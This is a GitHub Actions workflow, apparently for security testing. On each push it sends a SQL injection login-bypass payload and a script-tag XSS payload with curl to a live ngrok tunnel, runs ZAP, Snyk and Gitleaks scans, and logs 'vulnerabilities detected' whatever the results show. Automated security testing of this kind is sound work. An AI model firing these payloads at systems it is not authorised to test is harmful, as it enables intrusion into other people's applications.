name: Cloud Security Simulation

on:
  push:
    branches:
      - master

jobs:
  security_attack:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout Repository
        uses: actions/checkout@v4

      - name: Simulate SQL Injection Attack
        run: |
          echo "Executing SQL Injection Attack..."
          curl -X POST "https://9961-196-184-98-202.ngrok-free.app/login?returnurl=/" \
            -d "username=admin' OR '1'='1' -- &password="

      - name: Simulate XSS Attack
        run: |
          echo "Executing Cross-Site Scripting (XSS) Attack..."
          curl -X GET "https://9961-196-184-98-202.ngrok-free.app/search?query=<script>alert('XSS')</script>"

      - name: Run OWASP ZAP Security Scan
        uses: zaproxy/action-baseline@v0.8.0
        with:
          target: "https://your-ngrok-url.ngrok.io"
          fail_action: false
          rules_file_name: zap-rules.txt

      - name: Run Snyk Security Scan
        uses: snyk/actions/node@master
        with:
          args: test
        env:
          SNYK_TOKEN: ${{ secrets.SNYK_TOKEN }}

      - name: Run Gitleaks to Detect Secrets
        uses: gitleaks/gitleaks-action@v2
        with:
          config-path: .gitleaks.toml

      - name: Upload ZAP Security Report
        uses: actions/upload-artifact@v4
        with:
          name: zap-security-report
          path: report.json

      - name: Log Findings
        run: |
          echo "Security vulnerabilities detected. Check the reports!"
